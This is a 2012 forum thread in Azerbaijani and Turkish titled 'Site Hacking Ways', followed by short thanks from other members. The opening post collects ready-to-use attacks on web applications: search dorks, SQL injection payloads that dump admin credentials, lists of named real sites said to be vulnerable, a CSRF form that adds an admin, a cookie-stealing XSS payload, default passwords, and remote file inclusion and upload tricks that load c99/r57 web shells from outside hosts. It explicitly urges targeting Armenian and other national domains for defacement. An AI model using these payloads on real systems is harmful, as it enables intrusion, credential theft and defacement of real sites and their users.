Anti-armenia.ORG - Forumlar - Sayt Hacking Yolları [Part1]



Istifadəçi
    2012-04-02 15:35 GMT                 

Avatar Fearless



VIP
Mesaj Sayı : 1299
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   23  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : Gävle
Ölkə :
Məslək : Hacker,Defacer,Programmer
Yaş : 26
Mesaj :

Mövzunu Paylaş!


Salamlar... Bildiyiniz kimi Mail Hacking Yolları(GOLD) Adlı Mövzuda Sizlərə Mail-i hacklamağın Yolların Göstərmişdim... Bu Gün-də Sizlərə Saytı Necə Hacklamaq Olar Onu Göstərəcəm... Daha Doğrusu Sayt Açıqları və o açıqlardan istifadə bir növ Site Hacking... QEYD Edirəm indidən mövzuların çoxları Alıntıdır ! Yani Əməyə Hörmət Edərəm... İstəsəniz Müəlliflərində yazaram... Yani ona Görə Comment hissəsində Artıq Əksik sözlər yazmayın ! Və İndi isə Başlayaq (Mən Bu Mövzuda Açıqları Ordan Burdan Yazıram Ağlıma Gəldikcə )
============================================================================================================================================================
LY Network Cart SQL Injection
Kod:
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1
0                                                                      0
1                                                                      1
0           [ LY Network Cart - SQL Injection Vulnerability ]          0
1                                                                      1
0                [x] Author : the_cyber_nuxbie                         1
1                                                                      0
0                [x] Found  : 09 March 2012 @ 09:57 PM.                1
1                                                                      0
0                [x] Tested : Back|Track 5.                            1
1                                                                      0
0                [x] Dork   : inurl:"/pro.php?CateId="                 1
1                                                                      0
0                                                                      1
1                                                                      0
0                                                                      1
1                                                                      0
0                                                                      1
1                                                                      1
0                                                                      1
0                                                                      0
1                                                                      1
0                                                                      1
1                                                                      0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
________________________________________________________________________
************************************************************************

- Exploit Report:
http://localhost/pro.php?CateId=[SQL Injection]

- Page LogIn:
http://localhost/site/manage/ <--- LogIn Area...!!!

- Sample WebApps Vuln SQLi:
http://risvision.cn/en/pro.php?CateId=18' + [SQL Injection]
http://agiftfromchina.com/pro.php?CateId=11' + [SQL Injection]
http://taobaoxpress.com/pro.php?CateId=4' + [SQL Injection]
http://top1rc.com/pro.php?CateId=150' + [SQL Injection]
http://zh318.com/en/pro.php?CateId=46' + [SQL Injection]
http://deniya.com/pro.php?CateId=39' + [SQL Injection]
http://ccs123.com/pro.php?CateId=1' + [SQL Injection]
http://romerigo.com/pro.php?CateId=85' + [SQL Injection]
http://yin-yuan.com.cn/en/pro.php?CateId=10' + [SQL Injection]
http://ystuliao.com/pro.php?CateId=79' + [SQL Injection]
http://1000cch.com/pro.php?CateId=34' + [SQL Injection]
http://cgcguitar.com/pro.php?CateId=83' + [SQL Injection]
http://haotaofishing.com/en/pro.php?CateId=12' + [SQL Injection]
http://3150.com/pro.php?CateId=4' + [SQL Injection]
http://romerigo.com/pro.php?CateId=122' + [SQL Injection]
http://wartonclutch.com/pro.php?CateId=19' + [SQL Injection]
http://longa99.com/en/pro.php?CateId=17' + [SQL Injection]
http://sunwefashion.com/pro.php?CateId=26' + [SQL Injection]
http://fwsewing.com/en/pro.php?CateId=101' + [SQL Injection]
http://paint-by-frank.com/pro.php?CateId=48' + [SQL Injection]
http://yonesnav.com/en/pro.php?CateId=6' + [SQL Injection]
http://risumtech.com/pro.php?CateId=41' + [SQL Injection]


===============================================================================================================================================================
Vbulletin forumunda HIDE təqinin hacklanması

Salamlar
Yəqin çoxuvuz elə forumlara rast gəlmisizki oradan hansısa hack soft yükləmək istəyəndə linkə HİDE təqi qoyurlar
Yəni bu linki görmək üçün sizin forumda nə qədərsə postuvuz olmalıdır.
Bunun ötməyin bir yolunu sizə deyəcəm
misal üçün soft bu səhivədə yerləşir
http://site.az/showthread.php?t=123
HİDE isə 50 qoyulub yəni linki görmək üçün bu forumda ən azı 50 postuvuz olmalıdır
biz isə götürüb url-in axırına bele bir Kod əlavə edirik &highlight=[HIDE ve ya &highlight=[HID*

[url]http://site.az/showthread.php?t=123&highlight=[HIDE[/url]

[url]http://site.az/showthread.php?t=123highlight=[HID*[/url]

görürükkü link açılır
indi artıq yükləmək olar


============================================================================================================================================================

Joomla Açığı
Dork
Kod:
inurl:/index.php?option=com_jomtube

Exploit
Kod:
php?view=videos&type=member&user_id=-62+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat(0x3a5f,username,0x3a,activation,0x5f3a),14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+jos_users--&option=com_jomtube



Exploitdəki 3 yerinə password yazın yəni yeni Exploit
Kod:
php?view=videos&type=member&user_id=-62+union+select+1,2,password,4,5,6,7,8,9,10,11,12,group_concat(0x3a5f,username,0x3a,activation,0x5f3a),14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+jos_users--&option=com_jomtube


Şifrələr MD5 Halında olur bunun üçündə şifrələri qirmaniz yetər.

Örnək Sayt:
Kod:
http://jam-style.ru/index.php?view=videos&type=member&user_id=-62+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat(0x3a5f,username,0x3a,activation,0x5f3a),14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+jos_users--&option=com_jomtube

============================================================================================================================================================

osFileManager 2.2 CSRF / XSS / Disclosure/

Kod:
==========================================================================
Vulnerable Software: osFileManager_2.2
==========================================================================
Official site:http://www.osfilemanager.com/
# md5sum *.zip
df708d52ab2a50aa20fa9c6d779bc979 *osFileManager_2.2.zip
==========================================================================
About Software:
==========================================================================
osFileManager is an open source file management script written in PHP.
Includes User CP, Admin CP, and many basic file creation/modifying tools.
File Functions include: List, Open, View, Edit, Create, Upload, Rename and Move.
User Functions include: Change password, and Change color scheme.
Admin Functions include: New user, Edit user, Delete user.
Looks Nice: http://www.osfilemanager.com/screenshots.html
==========================================================================
Vuln Desc:
osFileManager 2.2 suffers from multiple CROSS SITE SCRIPTING and CROSS SITE REQUEST forgery vulnerabilities.

I noticed many peoples uses osFileManager 2.2
So Just beaware:


XSS (Non persistent XSS)
/index.php?p=home&d=<script>alert(document.cookie);</script>


/* CSRF Delete admin */
/index.php?p=deleteuser&muid=1
Where 1 means user id

Due insufficent sanitization *users administration* section also prone to Persistent CROSS SITE SCRIPTING(XSS) vulnerabilities
Print Screen:
http://s017.radikal.ru/i407/1203/d2/1db7ba7bd6a2.png

(Username & Server Directory inputboxes)
And can be mixed with CSRF POC (in eg: to deface /index.php?p=users      sections)

What is funny This FileManager Saves username and password "pair" in cookie which is totally wrong thing especially about *passwords*(sensitive data) (See print screen)
Once cookies stealed ... you know what's this means.


========================== CSRF ADD ADMIN ====================================================================
<body onload="javascript:document.forms[0].submit()">

<form name="user_edit" action="http://CHANGETO_RTARGET/index.php?p=saveuser" method="post">
<tr><td>Username: <td><input type="text" name="config_user" size="40" border="0" class="txtinput" value="pwnyou">
<tr><td>Name: <td><input type="text" name="config_name" size="40" border="0" class="txtinput" value="pwnyou">
<tr><td>Password: <td><input type="password" name="config_pass" size="40" border="0" class="txtinput" value="pwnyou">
<tr><td>Email: <td><input type="text" name="config_email" size="40" border="0" class="txtinput" value="pwnyou@pwnyou.tld">
<tr><td>Server Directory: <td><input type="text" name="config_folder" size="40" border="0" class="txtinput" value=".">
<tr><td>Http Directory: <td><input type="text" name="config_http" size="40" border="0" class="txtinput" value=""> (*)
<input type="text" name="config_limit" size="15" width="15" border="0" class="txtinput" value="500000">

<select name="config_language">
<option value="chinese">Chinese</option>
<option value="english" selected>English</option></select>

<select name="config_theme">
<option value="classic" selected>Classic</option>

</select>


<input type=radio name="config_status" value="1" id="stat1" checked>
<input type=radio name="config_status" value="0" id="stat2">


<input type=radio name="config_formatperms" value="0" id="perm1" checked>
<input type=radio name="config_formatperms" value="1" id="perm2">

<input type="checkbox" name="config_permbrowse" id="config_permbrowse" size="40" border="0" class="text" checked>
<input type="checkbox" name="config_permupload" id="config_permupload" size="40" border="0" class="text" checked>
<input type="checkbox" name="config_permcreate" id="config_permcreate" size="40" border="0" class="text" checked>

<input type="checkbox" name="config_permpass" id="config_permpass" size="40" border="0" class="text" checked>
<input type="checkbox" name="config_permdelete" id="config_permdelete" size="40" border="0" class="text" checked>
<input type="checkbox" name="config_permmove" id="config_permmove" size="40" border="0" class="text" checked>
<input type="checkbox" name="config_permedit" id="config_permedit" size="40" border="0" class="text" checked>
<input type="checkbox" name="config_permrename" id="config_permrename" size="40" border="0" class="text" checked>
<input type="checkbox" name="config_permget" id="config_permget" size="40" border="0" class="text" checked>

<input type="checkbox" name="config_permchmod" id="config_permchmod" size="40" border="0" class="text" checked>
<input type="checkbox" name="config_permsub" id="config_permsub" size="40" border="0" class="text" checked>
<input type="checkbox" name="config_permuser" id="config_permuser" size="40" border="0" class="text" checked>
<input type="checkbox" name="config_permadmin" id="config_permadmin" size="40" border="0" class="text" checked>
<input type="checkbox" name="config_permdeleteuser" id="config_permdeleteuser" size="40" border="0" class="text" checked>
<input type="checkbox" name="config_permedituser" id="config_permedituser" size="40" border="0" class="text" checked>

<input type="checkbox" name="config_permmakeuser" id="config_permmakeuser" size="40" border="0" class="text" checked>
<input type="checkbox" name="config_permprefs" id="config_permprefs" size="40" border="0" class="text" checked>


<input type=hidden name=muid value="">

</form>

<!--
username:pwnyou
passwd:pwnyou
-->

========================== EOF CSRF ADD ADMIN =================================================================


What is another issuse do you know?
It's users.sql comes defaultly with 2 users:

--
-- Dumping data for table `osfm_users`
--

INSERT INTO `osfm_users` VALUES(1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99', 'you@email.com', 'Admin', './', '', '20081005234859', '999999999999999999999', 'classic', 'english', 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 0);
INSERT INTO `osfm_users` VALUES(2, 'root', '5f4dcc3b5aa765d61d8327deb882cf99', 'you@email.com', 'root', '.', '', '20081005222012', '500000', 'classic', 'english', 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 0);


login: root
pass: password

And the second one:
username: admin
password: password

During 4-5 minutes googling about it(xxxxx) i found 8 sites which uses same usernames and passwords!!!(Which allows file uploads,file editings,steal database credentials
cos it stores database credentials in index.php    ---- In one word: "Paradise")


Theris also a lot of *unitialized* variables which causes E_NOTICE and E_WARNING's which can be classified as Info and Path Disclosure.

I hope developer(s)(http://www.osfilemanager.com/ && http://www.arzy.net/) will fix this all this issuses ASAP.Amin!

======================================= EOF ====================================================================

/AkaStep

============================================================================================================================================================

SinginForm.php Açığı
Dork :
Kod:
inurl:/signinform.php

============================================================================================================================================================

FTPİnBackground Açığı

1000-lərcə site var...

Googleyə

filetype:ini "FtpInBackground" (pass|passwd|password|pwd)

yazıb axtarırıq.

qarşımıza çıxan sitelerden birine giririk.

qarşımıza sitelerin domainleri istifadəçi adları ve

şifreleri gelir şifreler MD5 haldadırş şifreleri direk bu adrese

yapıştırıp anında sındırırıq :

Online Total Commander FTP wcx_ftp.ini password decoder

Örnək Budur: http://ak23.nazwa.pl/WB/wcx_ftp.ini

Sonrasını Siz Edin


============================================================================================================================================================

Joomla Upload Açığı
Kod:
DORK: inurl: index.php?option=com_expose
Exploit: /administrator/components/com_expose/uploadimg.php
Uploadin getdiyi yer : /components/com_expose/expose/img/

============================================================================================================================================================
Upload Açığı + Dork Yazmaq + Sadə SQL
Salamlar... Mən Avatar Fearless və bu gün sizlərə sadə upload açığın göstərəciyəm... Deməli dorkumuz nədir ? inurl:/upload.html... Siz Bu Açıqdan İstifadə Edərək Shell Upload Edəcəksiniz + Shellər Yuxarıda Yükləmələr Yerinden Tapa Bilərsiniz(Tövsiyəlilər c100 və c99-dur) bəs yaxşı niyə .html? çünki .php-lər çox vaxt rəsmi saytlarda olur + bu cür saytlardan shell upload eləmək çətindir... və Açığımız inurl:/upload.html indi isə gəlin bunu Armenia saytlarında tətbiq edək... onda belə olur inurl:.am/upload.html .am yani Armenia domainidi... bunu iran üçün tətbiq etsək inurl:.ir/upload.html və fransa üçün tətbiq edək inurl:.fr/upload.html
Dork Necə Yazılır?
Burda inurl sözü yani URL-in içində və : (işarə yani URL-din içində Nə Olacaq) və ölkə domaini (məsələn .fr , .ir , .am və s.) və / (işarə + dir yani public_html-diri ilk olaraq nəzərdə tutulut) və açığımız yani upload.html... Açıq başqa 1 şeydə ola bilər məsələn index.php?id= və ya page.php?id= bundan sonra isə saytlara baxırıq və URL-lərinə və açılan Səhifələrin axırına ' yada 'a artırırıq... Əgər


Kod:
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/towerclu/public_html/restaurant.php on line 12

Warning: mysql_num_rows() expects parameter 1 to be resource, boolean given in /home/towerclu/public_html/restaurant.php on line 31


Buna Bənzər 1 error gəlsə deməli açıq var... Və bu açıqlada ya Manual yolla yada Havij 1.5 free(Bunu Forumdan Tapa Bilərsiniz və ya Google-dən) ilə MySQL database-sindən user-lərin yada adminin username və pass-ın əldə edə bilərsiniz və s. və s.
Bu Günlük Bu qədər... Nə Sualınız olsa Buyurun... Əməyə Hörmət !

============================================================================================================================================================
============================================================================================================================================================
Shell Via File İnclude
Salamlar...Mən Avatar Fearless və Bu Gün Sizlərə Shell və File İnclude hakkında məlumat vereciyəm... Bu Hakda 1 mövzu açmışdım amma orda tam və aydın Başa Salmamışdım + Video-da Yox idi bu Anlatımdada video olmayacaq çünki Oxuyaraq daha aydın öyrənirik... İndi isə Anlatıma Keçək... Deməli File İnclude nədir? File = Fayl və İnclude = Artırmaq yani əlavə eləmək mənasına gəlri birləşdirdikdə Fayl Artırmaq yada Fayl Əlavə Eləmək Mənasını Daşıyır... İndi isə necə İstifadə Edirlər ?
Deməli biz ilk Öncə Sayt Açırları Tapmalıyıq misal üçün -- /patch/admin/config_settings.tpl.php?include_path=[Shell] deməli burda bunu inurl kimi axtarırıq amma axırdakı shell olmayacaq yani /patch/admin/config_settings.tpl.php?include_path= deyə google yada başqa axtarış sistemlərində axtarırıq və qabağımıza çıxan saytların dir-lərini silirik sadəcə sayt qalır və axırına bu kodu artırırıq /patch/admin/config_settings.tpl.php?include_path= deməli belə onda belə okur qurbansayt.com/patch/admin/config_settings.tpl.php?include_path=[Shell] olur... İndi isə bizə Shell Lazım olacaq... Bunun üçün Free Hosting saytlarında pulsuz 1 sayt açırıq və ora Shell-imizi upload edirik,Və Upload Edəcəyimiz Shell-ləri Siz Yükləmələr Bölməsindən tapa bilərsiniz , Sizə c99,r57 və wso 2.2-ni məsləhət görürəm... Məsələn sizinsayt.com/shellinadı.txt və bundan sonra isə belə olacaq bizim tapdığımız açıq bu idi qurbansayt.com/patch/admin/config_settings.tpl.php?include_path= və birləşdirək http://qurbansayt.com/patch/admin/config_settings.tpl.php?include_path=http://www.sizinsayt.com/shellinadi.txt? burda http://? lazımlıdır əgər bunlarsız Shell-i yapışdırsaq o zaman işləməz... Deməli beləliklə File İnclude Eləmiş oluruq... Bu Qədər Nə Sualınız Buyurun... Yəqin Anladınız... Əməyə Hörmət !

============================================================================================================================================================
============================================================================================================================================================
Login.ASP Açığı
Kod:
Salamlar... Mən Avatar Fearless və bu gün sizlərə Login.Asp Açığın Göstərəciyəm...Köhnə Metod olmasına baxmayaraq İşləkdir... Video-da hər şey verilib..
Username:admin
Password:1'or'1'='1
Əməyə hörmət !
Əməyə hörmət ![/code]

============================================================================================================================================================
============================================================================================================================================================
Remote File İnclude/İnclusion Method Attack
Salamlar Hamıya... Mən Avatar Fearless və bu gün Anti-armenia.Org -da Digər Adıyla AA Team -da 100-cü mövzumu paylaşıram və Çox Sevinirəm... Necə 1 xəəbr yerləşdirim Bilmədim Amma Əlimdən gəldiyi qədər Yazıb Kömək Olmağa Çalışacıyam... Bu Günkü mövzum Remote File Inclusion Metod attack... Video Dərslik Hazırlamaq Fikrinə Düşdüm amma Bəzi User-lər Video-nu öz adlarına götürürlər... Yazıdada Eynidir Alıntı Olduğun qeyd eləmirlər Nəysə .Deməli Belə İlk Öncə biz açıqlı Sayt Tapmalıyıq Bunun üçün yahoo.com Google.Com Yandex.Ru mail.Ru və s. axtarış yerlərində Allİnurl Dorku axtaracayıq... Hansın ? Deməli Bizim Açığımız
[code]/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=[/code]
Və Bu Dorku Axtarış Sistemlərində Axtarsaq tapmaq çətin olacaq o səbəbdən biz sadəcə /modules/tinycontent/ axtaracağıq... Qabağına İnurl Artırmaq Lazımdır yada olar... Fərq Etmir Axtarırıq Və Qabağımıza Çıxan Saytlarda Bunlar olacar - /modules/tinycontent/ və yani saytinadi.com/modules/tinycontent/index.php?id=4 burda index.php?id=4 əvəzinə başqasıda ola bilər... yada sadəcə saytinadı.com/modules/tinycontent/ və bundan sonra biz /modules/tinycontent/-i silib /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root= artıracağıq yani saytınadı.com/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root= olacaq bundan sonra isə bizə sadəcə 1 c99.txt? lazım olacaq yada r57.txt? mən sizə 3 ədəd verirəm

[code]http://www.freewebs.com/seriouserror/c99.txt?
http://bizimcafe.t35.com/c99.txt?
[url]http://r57.li/dtoolpro.txt?[/code][/url]

Və Bunlardan 1-in seçirik Və URL-imizin axırına artırırıq...yani saytınadı.com/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.freewebs.com/seriouserror/c99.txt? olacaq və Bu yollada avtomatik olaraq sayta shell yüklənmiş olur yada saytı Shell ilə açırıq... Burdan sonrası asanddır... Sadəcə İndex.Php faylını eidtləyirik və ora öz İndex.html-in code-lərin atırıq...1 Şeydə qeyd edim açıq həmişə /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root= olmur RFİ açıqlarıda sayılır məsələn error.php?error= burada hərhansı birin qoyuruq bu qədər... Ümüdvaramki Anladınız. Nəsə Sualınız olsa buyurun... Nəsə Səhvim olsa da Buyurun... 100-cü xəbərim umudvaram sizə anlayış gətirib... Qeyd etdiyim kimi Video özüm qoymadımki sonra öz adlarına götürməsinlər... Əməyə Hörmət !

============================================================================================================================================================

Wordpress Database Açığı
allinurl:wp-config.txt

============================================================================================================================================================

İndex.Html Upload
Salamlar... Mən Bu gün siz yenilər üçün maraqlı 1 mövzu açmaq fikrinə düşdüm... Deməli Bu yol ilə siz saytları hacklaya bilərsiniz... AMma hər saytı yox sadəcə Upload saytların hacklaya bilərsiniz... Sizə hacklaya biləcəyiniz 3 sayt verirəm qalanların siz tapın... Qısaca Başa Salım giririk və index-imizi upload edirik və indeximizi açırıq Fso olur hacklandi Və misal olaraq

Bura Bax və digər 1-i Bura Bax

indi isə Saytları verim...

GateWayVideos.Com
Semaphoredesktops.co.uk
Mx2Graphicks.Com

Əməyə Hörmət üçün şərh yazmağı unutmayın ! Bu yolla Məşq Edin Lamerlik yox !
============================================================================================================================================================
============================================================================================================================================================
File İnclude Attack
Şimdi öncelikle google veya yahoo ya girip bu açığı aratıcaz

index.php?option=com_expose

arattık sanırsam yaklaşık 178.000 site çıkıyor.Bakın Burda Önemli olan şu.Googlede 100 sayfada 178.000 siteyi göremessiniz.Bu yüzden şöyle yapıcaz.Yani Daha Fazla Site Hacklemek için Ve açıkdan yararlanmak için


es/index.php?option=com_expose böyle aratırız bakın ben es koydum es ispanyanın domain uzantısıdır.Siz Diğer ülkelerin uzantılarını koyarak aratacağınız siteleri çoğalta bilirsiniz.örneğin: it/index.php?option=com_expose böyle aratırsakda italyan siteleri çıkar.Neyse siteler açıldı.Çıkan sitelerin sonuna


administrator/components/com_expose/uploadimg.php

bu kodu eklicez eğer sitede açık varsa upload bölümü çıkacak.Ve shelimiz upload edicez tabi sheli yollamadan önce elimizdeki r57 yi ve c99 u birlikte aç diyip txt şeklinde açıcaz.Ve çıkan php kodlarının en başına

GIF89;a bu kodu koyucaz.ve farklı kaydet diyip çıkıcaz.sonra siteye shelimizi upload edelim.bir hata vericek o hatayı verirse siteye shelimiz upload olmuştur demektir. sonra tekrar sitenin sonuna

/components/com_expose/expose/img/ bu kodu eklicez ve bununda sonuna attığımz shelin url sini koyucaz örneğin şöyle

/components/com_expose/expose/img/r57.php böyle ve enter diyip shelle bağlanıcaz indeximiz basıcaz.bakın burda dikkatli olmanın yeri domain uzantılarını farklı sitelerde denemek .

============================================================================================================================================================
============================================================================================================================================================
İndi isə SQL Açığından Manual Getmək
Mövzu Bax
Salamlar... Bu Video-da Sizlərə SQL İnjection-ı Necə Manual Yol ilə Hack Eləmək olar onu Göstərmişəm.Yani Bu Yol-da Siz Havij-i yükləməyə ehtiyac qalmayacaq Çünki bu yol ilə siz bəlkədə havij-də vura bilmədiyiniz saytları vura bilərsiniz... Özünüz Məşq Edərsiniz ! Yol uzundu amma düzgün nəticıdi ! Video-ya baxanda necə çətinlik olduğunu anlayarsınız !Deməli Əlimdə Sayt Olmadığından Sadə Verdim... Yani saytın site.com idi ona görə üzrlü hesab edin... video-dərslikdədə yazılarla göstərmişəm... Uzun ola bilər amma yararlıdır...Nəsə Səhvim varsa Üzrlü Hesab Edin... Yeni Başlayanlar Yararlansın ! Və saytda bu hakda mövzu görmədim Varsada Mövzu Delete oluna bilər... Narahatçılıq yoxdu. Əməyə Hörmət!



Video Download :
[code]http://uploading.com/files/e5ae3fc3/Manual%2BYolla%2BSQL%2BHack.rar/
http://ul.to/r3inoeqs
https://rapidshare.com/files/3561508000/Manual_Yolla_SQL_Hack.rar
[url]http://www.mediafire.com/?5gbi5czj4384670[/code][/url]


0-dan Son-a :
[code]http://site.com/index.php?id=50
http://site.com/index.php?id='50
http://site.com/index.php?id=50 order by 52--
http://site.com/index.php?id=-50 union all select 1,2,3,4,5,6,7,8,9,10,11--
http://site.com/index.php?id=-50 union all select 1,2,version(),4,5,6,7,8,9,10,11--
http://site.com/index.php?id=-50 union all select 1,2,table_name,4,5,6,7,8,9,10,11 FROM information_schema.tables--
http://site.com/index.php?id=-50 union all select 1,2,column_name,4,5,6,7,8,9,10,11 FROM information_schema.column--
http://site.com/index.php?id=-50 union all select 1,2,schema_name,4,5,6,7,8,9,10,11 FROM information_schema.schemata--
http://site.com/index.php?id=-50 union all select 1,2,contact(username,0x3,password),4,5,6,7,8,9,10,11 FROM database_name.table_name--[/code]


Source :
[code]====================================================
\\\\\\\\\\\\\\Avatar Fearless///////////////////////
====================================================

Salamlar... Men Avatar Fearless... Ve Bu Gun Sizlere SQL Acigindan Manual Yolla Hack Etmeyi faydalanmayi gostereciyem... Demeli elimde
Sayt olmadigindan qurban sayt http://site.com/ olacaq dork index.php?id=50 misal olaraq... Indi demeli sayti tapdiq Dork + site :
http://site.com/index.php?id=50 indi biz burda aciq oldugunu bilmek ucun : "=" ile "50"-nin arasina ' isaresin artiririq yani
http://site.com/index.php?id='50 eger error cixarsa (Mes: You hace a Syntax SQL Error kimi ) o zaman demeli Sayt-da aciq var... Indi
bundan Faydalanmaq lazimdir... Demeli ilk once Saytin heqiqi acigi olduguna baxaq bunun ucun order by "nomreler" olacaq nomre-lerde 50
-den cox olmalidi yani http://site.com/index.php?id=50 order by 52 ve ya 51 eger unknown columns ./52 yada bashqa cur error coxsa
demeli aciq var... Aha Demeli indi ise aciga baxaq... Yani tutaqki acigi 10-dan axtaraq... http://site.com/index.php/id=-50 order by 10
sonra 11 sonra 12 ve s. taki qabagima error cixana qeder meselen
http://site.com/index.php?id=50 order by 10 [no error]
http://site.com/index.php?id=50 order by 11 [no error]
http://site.com/index.php?id=50 order by 12 [error]
kimi... bu zaman bu URL-e baxaq
http://site.com/index.php?id=-50 union select all 1,2,3,4,5,6,7,8,9,10,11-- 12-de error cixdigina gore demeli 12-ci yoxdu ona gore 11-e qeder
aha demeli indi ise burda bizim qabagimiza 4-5 eded reqem cixir meselen 8 , 5,4,3 kimi bizde burdan en az olanini secmeliyik yani 3 o zaman
http://site.com/index.php?id=-50 union select all 1,2,version(),4,5,6,7,8,9,10,11--
kimi ve yene qarshimiza reqemler cixacaq eger reqemlerin arasinda <=5 meselen 5.0.4.3 kimi yazi cixsa demeli hacklaya bilerik... tutaqki cixdi
o zaman indi Table adini goturek ve 1 text documente yazaq
http://site.com/index.php?id=-50 union select all 1,2,table_name,4,5,6,7,8,9,10,11 FROM information_schema.tables--
From yani -dan -den information_schema.tablesden table adini tapiriq... Ve ora coxlu table-ler gelir... bizde ctrl+f ile admin sozunu axtaririq
eger olmasa onda user,ve s. kimi ve tutaqki qabagimiza cixdi tbadmin yani adminin table-si indi bunu qeyd edek indi sira geldi column's-a
http://site.com/index.php?id=-50 union all select 1,2,columns_name,4,5,6,7,8,9,10,11 FROM information_schema.columns--
Ve burda colum's-larda cixdi indi bunlarin arasinda username , password kimi .txt formatli fayllari axtaririq yene ctrl+f user ve ya username
yada uname tapiriq yada bashqalarda ola biler user's kimi ve s. sonrada password-lari pw , pwsd ve s. ola biler... Cox vaxt username-nin altidna olur
ve tutaqki tapdiq yani username , password columns-lardi daha yazma eziyyeti cekmeyek coxdan yazmishiq indi ise schema-nin yani DB-nin adin oyrenek :
http://site.com/index.php?id=-50 union all select 1,2,schema_name,4,5,6,7,8,9,10,11 FROM information_schema.schemata--
burda schema yani DB burdan adini gotururuk meselen 390802_siteadiblabla kimi (meselen ) indi gelin burdan Admin shifresi + loginin elde edek :
http://site.com/index.php?id=-50 union select all 1,2,contact(username,0x3,password),4,5,6,7,8,9,10,11 From database_name.table_name--
indi burda database_name.table_name-- bunlari yerine qoyaq
http://site.com/index.php?id=-50 union select all 1,2,contact(username,0x3,password),4,5,6,7,8,9,10,11 From 390802_siteadiblabla.tbadmin--
indi burda sorushursunuzki niye 0x3? cunki biz acigi 3-cu collumn'sda tapdiq 4 olsa 0x4 olacaqdi ve linkk yani URL elimizde ve bu URL-e daxil olduqda
login , pass elinize dushur daha sonrada ordan shell upload edib vura bilersiniz ordanda server mass deface vs. vs. Yani bu qeder asand... login
pass nece olur onuda deyim demeli meselen login ishir-dirse onda ishir[0x3]ishir123 olacaq amma burda [0x3] balaca olacaq kvadrat icerisinde resm kimi
indi men ede bilmirem neyse burda ishir admin logini olacaq ishir123 -de pass niye? cunki bura diqqet : (username,0x3,password) 1-ci username yazmishiq ona gore
qeyd burda siz username yazmayacaqsiniz eger burda username columnsu ferqli olsa onda bashqasin yazacaqsiniz...
Bu gunluk-de bu qeder... Sayt tapan kimi Tutorial elave edecem... Teshekkurler izlediyiniz ucun... By. Avatar Fearless !!!
==========================================================
\\\\\\\\\\\\\\\\\\\\\\\Avatar Fearless////////////////////
==========================================================[/code]

Information
[code]Table Name : tbadmin

Columns : username , password

DB Name : 390802_siteadiblabla[/code]
============================================================================================================================================================
============================================================================================================================================================
WP FilesList WordPress Loglarını əldə etmək üçün 1-2 qısa yol...
Salamlar... Arxivimdə Gördüm Dedim paylaşım.... WP Fayl Listi... Aşağıda list var onları saytın axırına artırıb Məlumat qazana bilərsiniz...
List :
[code]wp-admin
wp-content
wp-includes
data.sql
fantversion.php
index.php
license.txt
readme.html
wp-activate.php
wp-app.php
wp-atom.php
wp-blog-header.php
wp-comments-post.php
wp-commentsrss2.php
wp-config-sample.php
wp-config.php
wp-cron.php
wp-feed.php
wp-links-opml.php
wp-load.php
wp-login.php
wp-mail.php
wp-pass.php
wp-rdf.php
wp-register.php
wp-rss.php
wp-rss2.php
wp-settings.php
wp-signup.php
wp-trackback.php
xmlrpc.php
[/code]

============================================================================================================================================================

=================================================================================================================================================

http://s017.radikal.ru/i404/1202/c6/a2947080a3c4.png
Anti-armenia.ORG
    

Istifadəçi
    2012-04-02 16:42 GMT                 

Mr.OpiL



Banned
Mesaj Sayı : 149
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   2  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş : 25
Mesaj :

Mövzunu Paylaş!


Yenilər üçün böyük bir şeydi bu .. Təşəkkür Avatar .. Əməyə hörmət.. Məncə buda GOLD olmalıdı

Anti-armenia.ORG
    

Istifadəçi
    2012-04-02 16:50 GMT                 

K0K4!N



İstifadəçi
Mesaj Sayı : 115
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   1  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş : 35
Mesaj :

Mövzunu Paylaş!


Təşəkkürlər məndədə var 50 sayt hack yolları yaxinda paylaşacam.
Yetərki Bizim Mövzulari Qiymətləndirsinlər

Bir Daha TƏŞƏKKÜR QARDAŞ

Anti-armenia.ORG
    

Istifadəçi
    2012-04-02 17:14 GMT                 

kasib_oglann



Banned
Mesaj Sayı : 30
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   0  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


Təsəkkürlər qiymətli mövzüdu

Anti-armenia.ORG
    

Istifadəçi
    2012-04-02 17:27 GMT                 

ID:HAcKER



İstifadəçi
Mesaj Sayı : 93
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   2  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək : ID:HACkER
Yaş :
Mesaj :

Mövzunu Paylaş!


Hallal olsun sənə buna çoxlu səbir və coxlu əmək lazımdı halal olsunəməyə Hormət

İD:HAcker
Anti-armenia.ORG
    

Istifadəçi
    2012-04-03 09:33 GMT                 

StealtH



Security
Mesaj Sayı : 839
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   25  
Indi Saytda : Durum
